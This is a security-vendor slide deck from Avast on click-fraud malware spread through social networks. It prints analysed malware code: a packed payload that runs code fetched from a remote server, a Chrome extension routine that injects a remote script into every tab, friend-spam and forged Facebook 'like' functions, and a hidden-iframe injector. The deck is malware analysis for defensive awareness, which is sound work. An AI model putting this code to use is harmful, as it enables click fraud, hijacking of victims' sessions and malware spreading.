Every Click Counts (But All the Money Goes to Me)

Date post: 07-Aug-2015
Upload: avast-software

Every Click Counts (But All the Money Goes to Me)

Lukáš Hasík, Jan Širmer

Agenda

• Simple way to steal credentials
• Click for me
• Executable clicker
• Data from AVAST CommunityIQ userbase
• Summary
• Questions

Simple way to steal credentials

Simple way to steal credentials

credentials

Simple way to steal credentials

Simple way to steal credentials

User feels confident – s/he received a confirmation

Simple way to steal credentials

And some users really provided their real credentials…

Click for me

Executable clicker

Click for me

Flash player warning

Software Installation

Payloads

Payload in IE

Payloads for FF and Chrome

eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){

whie(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};

while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}

('36 39={3:12,10:12,59:9(){2.3=20.50["@41.40/43-44;1"].48(20.33.45).81("39.") ;2.3.79(20.33.78);2.3.77("",2,31);2.10=20.50["@41.40/43-44;1"].48(20.33.45); 11(2.3.6("13")==25||2.3.6("13")=="")52=75;3252=31;11(2.3.6("17")==25||2.3.6("17")==""){2.3.23("17",2.17());2.10.18(12)}11(2.3.6("13")==25||2.3.6("13")==""){2.3.23("13",27.55(283().54()/51));2.10.18(12)}11(2.3.6("35")==25||2.3.6("35")==""){2.3.23("35",60);2.10.18(12)}17=2.3.6("17");13=2.3.6("13");65=(27.55(28 53().54()/51)-2.3.6("35")); 11(52||(13<65)){2.3.23("13",27.55(28 53().54()/51));2.10.18(12);2.46("21","`||71\'\'80&68\'24&76`74}5", 17,8)}},64:9(){36 10=20.50["@41.40/43-44;1"].48(20.33.45);10.18(12)},21:9(7,49){11(2.3.6(7)==25||2.3.6(7)=="") {2.3.23(7,49);2.10.18(12);29 49}32{29 2.3.6(7)}},30:9(7,22,26){11(7=="21"){2.46("69","72>++70}68*73+95*101; 102",22,26)}32{11(2.3.6("47")!=25||2.3.6("47")!=""){2856(2.3.6("47"))()}}},46:9(7,21,22,26){63=2.58(2.21(7,21),26)+""+22+"&24=1&100=99&97="+27.98(27.66()*104);38=2.3;24=2.10;34=2;67{36 19=28 103();19.107 ("109",63); 19.108=9(82){11(19.105==4){11(19.106==96){67{28 56(19.87)()}57(15){34.30(7,22,4)}}32{38.23(7,21);24.18(12); 34.30(7,22,4)}}};19.86()}57(15){34.30(7,22,4)}},58:9(42,26){15="";85(37=0;37<42.83;37++){38=42.84(37);24=38^26;15=15+88.89(24)}29 15},17:9(){36 14=9(){29(((1+27.66())*94)|0).93(16).92(1)};29(14()+14()+14()+14()+14()+14() +14()+14())}};61.62("90",9(15){39.59()},31);61.62("91",9(15){39.64()},31);',10,110,'||this|prefs|||getCharPref|m||EDITED'.split('|'),0,{}));

Unpacked dean

Change setting in browser

TestAddon.buri user set string lppt >++igg}em*gki+n*tlt;q9

TestAddon.ch default string

TestAddon.date user set string 1340624313

TestAddon.guid user set string 3c94f90903f031a799162872a55742e8

TestAddon.int user set string 60

TestAddon.uri user set string ‘||x2””eakzg9:&i|”b&x’x7}5

j.php content

// Analyst note: this is the Chrome-extension payload ("j.php") shown in the talk.
// Both code paths call chrome.tabs.executeScript with a string of code that creates
// a <script> element whose src points at a remote server (the path was EDITED by the
// presenters), so whatever that server returns runs inside every top-level page the
// victim visits. The two injected strings reference different hostnames
// (uhnm6.me vs uhnm76.me); whether that is transcription noise or two real
// distribution hosts cannot be decided from this page.
// Detection hint: an extension that executes a code string which appends a <script>
// with an external src into <head> of every tab is a strong indicator of this family.
function updated(tabId, changeInfo, tab){
  // Runs on every tab update but only acts once the page has finished loading.
  if(changeInfo.status == 'complete'){
    // window==window.top limits the injection to the top-level frame, not nested iframes.
    chrome.tabs.executeScript(tabId, {code:"if(window==window.top){var h=document.getElementsByTagName('head')[0];var s=document.createElement('script');s.type='text/javascript';s.src='http://uhnm6.me/EDITED.php?v=0.05a';h.appendChild(s);}"}, null);
  }
}
chrome.tabs.onUpdated.addListener(updated);
// Tabs that are already open when the extension starts are injected immediately,
// so the victim does not need to navigate anywhere for the payload to load.
chrome.tabs.getAllInWindow(null,function(tabs){
  for(var i=0;i < tabs.length;i++){
    chrome.tabs.executeScript(tabs[i].id, {code:"if(window==window.top){var h=document.getElementsByTagName('head')[0];var s=document.createElement('script');s.type='text/javascript';s.src='http://uhnm76.me/EDITED.php?v=0.05a';h.appendChild(s);}"}, null);
  }
});

js_f.php

• Two different ways
1. Spreading malware to other people and working as a clicker

2. Only clicker

Spreading malware

• The script updates the victim’s Facebook and Twitter status by posting new status messages

Spreading malware

// Analyst note: spam template table used by the "spreading" variant (js_f.php).
// A 10-slot array is allocated but only slot 0 is visible in this transcript.
var videos = new Array(10);
// As far as the visible code shows, the record holds: a numeric string, a clickbait
// title, a caption, a shortened link, a thumbnail image URL, an empty string, another
// numeric string, the word "friend", several numeric ids and a token-like string.
// What each id refers to is not established anywhere on this page — do not assume;
// verify against the full sample before using them as indicators.
videos[0] = Array("80", "Kirst*en. Dunst mastur*bating on hidden camera", "It happened in United Stateshotel", "http://bit.ly/MTfe4S", "http://i.imgur.com/NjZPU.jpg", "", "20", "friend", "327065014030715", "431402153539537", "AQBu92VH5GDqrJkp", "2309869772");
// Declared here but not referenced within the lines visible on this page.
var flk = Array();

if ((1 == 1)) {

var randomnumber = Math.floor(Math.random() * 100);

if (randomnumber > 0) {

Spreading malware

var uri = "http://tol.co/5q";

if ((document.location.href.search("tagged.com") > -1)) {

var ids = get_friends_t(1);

if (ids.length > 0) {

for (var i in ids) {

send_msg(uri, ids[i], "2222")

}

} else {

post_item("LOL Miley Cyrus got caught having s3x " + uri, "2222")

}

}

Functionality

// Analyst note: forges a Facebook page "like" for `pageid` by POSTing a form body to
// the relative URL /ajax/pages/fan_status.php, i.e. to the origin the script is
// running in, so the victim's own session cookies are sent with it.
// `fid` (post_form_id) and `fbdt` (fb_dtsg) are globals defined elsewhere in the
// script and not visible here — presumably request tokens scraped from the victim's
// page; confirm against the full sample.
// Style note: the local `likepage` variable shadows the function's own name inside the body.
function likepage(pageid) {
  var likepost = "fbpage_id=" + pageid + "&add=1&reload=1&preserve_tab=true&nctr[_mod]=pagelet_header&post_form_id=" + fid + "&fb_dtsg=" + fbdt + "&lsd&post_form_id_source=AsyncRequest";
  var likepage = new XMLHttpRequest();
  likepage.open("POST", "/ajax/pages/fan_status.php?__a=1");
  // Fire-and-forget: no readyState/onload handler, the response is never read.
  likepage.send(likepost)
}

Functionality

function get_online_friends(limit) {

var friends = get_friends(limit);

var friends = make_array(friends);

friends.sort();

var postfields = "user=" + uid;

for (var i = 0; i < friends.length; i++) {

postfields += "&available_user_info_ids[" + i + "]=" + friends[i]

}

Functionality

function get_solved_captcha(extra_challenge_params, opt) {

var output = new Array(3);

var post = new XMLHttpRequest();

post.open("GET", "http://mp56a.com/fn/cs/api/s_c.php?u=" + escape(extra_challenge_params), false);

post.send();

if (post.readyState == 4 && post.status == 200) {

data = eval('(' + post.responseText + ')');

console.log(data);

post[1] = data.key;

post[2] = data.challenge

}

// Create injected iframe
// Analyst note: three helpers from the clicker payload. createIframe() appends an
// iframe that is absolutely positioned at the top-left corner with width and height
// 100%, so it covers the whole viewport of the host page; the slide text describes
// this as the "hidden iframe" through which the sites on the clicker's list are loaded.
// Detection hint: a DOM-appended iframe styled position:absolute; top:0; left:0;
// width:100%; height:100% on a page that never declared one.
function createIframe(src) {
  var ifr = document.createElement("iframe");
  ifr.setAttribute("src", src);
  ifr.style.position = "absolute";
  ifr.style.top = "0";
  ifr.style.left = "0";
  ifr.style.width = "100%";
  ifr.style.height = "100%";
  document.body.appendChild(ifr)
}
// Returns the id attribute of the `no`-th <img> element found under `src`
// (assumes `src` is a DOM node — not checked). `x` is assigned without `var`,
// so it leaks as an implicit global.
function get_img_src(src, no) { x = src.getElementsByTagName("img"); return x[no].id }
// Parses the HTML string `src` into a detached <div> via innerHTML and returns it;
// the markup is trusted blindly, there is no sanitisation.
function make_dom(src) { var tempDiv = document.createElement("div"); tempDiv.innerHTML = src; return tempDiv }

Clicker

• BHO, Firefox and Chrome payloads contain link to site like

http://resultsz.com/search/anticheat6.php?username=foreste

• There is a hosted list of sites that all of these “clickers” use to inject a hidden iframe into every visited site, earning money for the blackhat.

Summary

• Be aware of social engineering – even simple attempts can be successful

• Social networks are used for spreading malware – more users == more efficiency

• Trendy topics, celebrities and the latest news are often the starting point for these infection vectors

Questions and Answers

Thank you

Jan Sirmer ([email protected])

Senior Virus Analyst

Lukas Hasik ([email protected])

QA Director

